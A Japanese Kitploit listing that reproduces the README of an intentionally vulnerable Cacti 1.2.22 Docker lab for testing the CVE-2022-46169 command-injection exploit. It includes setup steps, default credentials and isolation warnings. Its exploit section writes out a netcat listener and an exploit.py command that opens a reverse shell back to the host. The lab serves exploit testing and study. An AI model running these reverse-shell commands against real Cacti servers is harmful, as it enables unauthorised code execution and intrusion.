Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cacti-rce-cve-2022-46169-vulnerable-application — 警告: これはCactiコマンドインジェクション(CVE-2022-46169)のエクスプロイトをテストするための脆弱性アプリケーションです。自己責任で実行してください! | Kitploit
ツール/GitHubGitHub/m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールラボと実践
GitHubm3ssap0/cacti-rce-cve-2022-46169-vulnerable-application

cacti-rce-cve-2022-46169-vulnerable-application

警告: これはCactiコマンドインジェクション(CVE-2022-46169)のエクスプロイトをテストするための脆弱性アプリケーションです。自己責任で実行してください!

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
123年前未レビュー

Cacti v1.2.22 コマンドインジェクション (CVE-2022-46169) 脆弱なアプリケーション

これは、Cacti の脆弱性 (CVE-2022-46169) に対するエクスプロイトをテストするための脆弱なアプリケーションです。

警告!

このアプリケーションには深刻なセキュリティ脆弱性が含まれています。自己責任で実行してください!バックアップを取り、隔離された環境(最近のスナップショットとホストオンリーネットワークを備えたVMなど)での使用を推奨します。このアプリケーションをインターネットに公開されたサーバーにアップロードしないでください。侵害されます。

免責事項: このアプリケーションをどのように使用するかについて、私は一切責任を負いません。このアプリケーションの唯一の目的は、CVE-2022-46169エクスプロイトのテストシナリオを提供することであり、悪意を持って使用されるべきではありません。このアプリケーションのインストールによってサーバーが侵害された場合、それは私の責任ではなく、アップロードしてインストールした人物の責任です。

脆弱性情報

  • CVE-ID: CVE-2022-46169
  • リンク: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46169
  • 説明: 影響を受けるバージョンでは、特定のデータソースが監視対象デバイスに選択されている場合、コマンドインジェクションの脆弱性により、認証されていないユーザーがCactiを実行しているサーバー上で任意のコードを実行できる可能性があります。

使用方法

環境をセットアップする手順は次のとおりです。

  1. 構成を開始するには docker compose up -d を実行します。
  2. http://127.0.0.1/cacti にブラウザでアクセスして、Cacti 初期化ウィザードを開始することで、手順を完了できます。データベースに関するエラーが発生した場合は、少し待ってからページを更新してください。
  3. デフォルトの認証情報は admin/admin です。
  4. ウィザード中はすべてのボタンで "Next" を押し、それに応じてオプションを選択してください。デフォルトのままで問題なく、必須の前提条件はすべて満たされているはずです。
  5. インストール後、新しいグラフをセットアップする必要があります:
    1. "Create graphs" をクリックします。
    2. "Graph Templates" セクションの "Create" の横にあるドロップダウンメニューで、"Device - Uptime" を選択します。
    3. "Create" ボタンを押します。

コンテナは vuln-cacti という名前になります。

環境を破棄するには、docker compose down コマンドを使用します。

Cacti の公式インストールガイドは ここ にあります。

根本原因

この脆弱性の詳細な根本原因は ここ で確認できます。

エクスプロイト

公開エクスプロイトは Exploit-DB で提供されています。簡単のため、exploit/ フォルダーにコピーされています。

実行するには:

  1. ホストマシンで netcat を使用して着信接続を待ち受けます。
    root@kitploit:~
    nc -lvp 6669
    
  2. エクスプロイトを起動します。
    root@kitploit:~
     ./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
    
    ヒント: コンテナからホストマシンにアクセスするには host.docker.internal を使用します (参考)。

vulhub リポジトリ にもエントリがあります。

著者

  • Antonio Francesco Sardella - 実装 - m3ssap0

ライセンス

このプロジェクトは Unlicense の下でライセンスされています。詳細は LICENSE ファイルを参照してください。

謝辞

  • Stefan Schiller — この脆弱性を発見したセキュリティ研究者。
  • Riadh Bouchahoua — エクスプロイト開発者。
ツールをダウンロード